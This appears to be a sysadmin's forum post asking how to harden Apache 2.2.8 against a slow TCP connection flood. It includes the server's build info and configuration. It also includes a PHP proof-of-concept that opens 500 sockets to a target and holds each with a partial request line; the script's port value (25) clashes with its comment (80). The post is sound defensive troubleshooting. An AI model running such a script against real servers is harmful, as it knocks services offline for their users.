|
Hello, One of my servers was affected by TCP flood attack
targeted to http service (Apache 2.2.8). Short attack description: an attacker
opens large amount of TCP connections to Apache service and sends few bytes
(for example, a single “GET / HTTP/1.1” line) to every opened
connection. The HTTP service opens a new process for every such connection and
waits for further input. After a short time, HTTPd runs out of connection limit
and stops responding. Some of my servers are protected by state tracking
firewall that protects them against such kind of attack. My question: is there possible to configure Apache
HTTPd in order to protect it against these attacks? Thank you in advance. ##################################################################################### Here is the simple PHP script that demonstrates the
attack: <?php /** * Proof of concept script: TCP connection
flooding * THIS SCRIPT WAS WRITTEN FOR INTERNAL TEST
PURPOSES ONLY!!! */ // "Victim" server IP address or domain
name $target_host='192.168.2.222'; // TCP port (normally, 80) $target_port=25; $conn=array(); for ($i=0; $i<500; $i++) { if ($conn[$i]=@fsockopen($target_host,
$target_port)) { echo "Connection #$i
opened\n"; flush(); fwrite($conn[$i], "GET /
HTTP/1.1\r\n"); // lets send the first line and grab an apache process } } sleep(30); // The server must be blocked until the
script exits ?> ##################################################################################### Here is some local Apache data: # /usr/sbin/apache2ctl -V Server version: Apache/2.2.8 (Ubuntu) Server built: Mar 10 2009 18:09:51 Server's Module Magic Number: 20051115:11 Server loaded: APR 1.2.11, APR-Util 1.2.12 Compiled using: APR 1.2.11, APR-Util 1.2.12 Architecture: 64-bit Server MPM: Prefork threaded: no forked:
yes (variable process count) Server compiled with.... -D
APACHE_MPM_DIR="server/mpm/prefork" -D APR_HAS_SENDFILE -D APR_HAS_MMAP -D APR_HAVE_IPV6 (IPv4-mapped addresses
enabled) -D APR_USE_SYSVSEM_SERIALIZE -D APR_USE_PTHREAD_SERIALIZE -D SINGLE_LISTEN_UNSERIALIZED_ACCEPT -D APR_HAS_OTHER_CHILD -D AP_HAVE_RELIABLE_PIPED_LOGS -D DYNAMIC_MODULE_LIMIT=128 -D HTTPD_ROOT="" -D
SUEXEC_BIN="/usr/lib/apache2/suexec" -D
DEFAULT_PIDLOG="/var/run/apache2.pid" -D
DEFAULT_SCOREBOARD="logs/apache_runtime_status" -D DEFAULT_LOCKFILE="/var/run/apache2/accept.lock" -D
DEFAULT_ERRORLOG="logs/error_log" -D
AP_TYPES_CONFIG_FILE="/etc/apache2/mime.types" -D
SERVER_CONFIG_FILE="/etc/apache2/apache2.conf" ##################################################################################### # cat apache2.conf |egrep "^[a-zA-Z0-9
\t<].*" ServerRoot "/etc/apache2" LockFile /var/lock/apache2/accept.lock PidFile ${APACHE_PID_FILE} Timeout 15 KeepAlive Off MaxKeepAliveRequests 100 KeepAliveTimeout 10 <IfModule mpm_prefork_module>
StartServers 5
MinSpareServers 5
MaxSpareServers 10
MaxClients 100 MaxRequestsPerChild 0 </IfModule> <IfModule mpm_worker_module>
StartServers 2
MaxClients 100 MinSpareThreads
25
MaxSpareThreads 50
ThreadsPerChild 25 MaxRequestsPerChild 0 </IfModule> User ${APACHE_RUN_USER} Group ${APACHE_RUN_GROUP} AccessFileName .htaccess <Files ~ "^\.ht"> Order allow,deny Deny from all </Files> DefaultType text/plain HostnameLookups Off ErrorLog /var/log/apache2/error.log LogLevel warn Include /etc/apache2/mods-enabled/*.load Include /etc/apache2/mods-enabled/*.conf Include /etc/apache2/httpd.conf Include /etc/apache2/ports.conf LogFormat "%h %l %u %t \"%r\" %>s
%b \"%{Referer}i\" \"%{User-Agent}i\"" combined LogFormat "%h %l %u %t \"%r\" %>s
%b" common LogFormat "%{Referer}i -> %U" referer LogFormat "%{User-agent}i" agent ServerTokens Prod ServerSignature Off Include /etc/apache2/conf.d/ |
|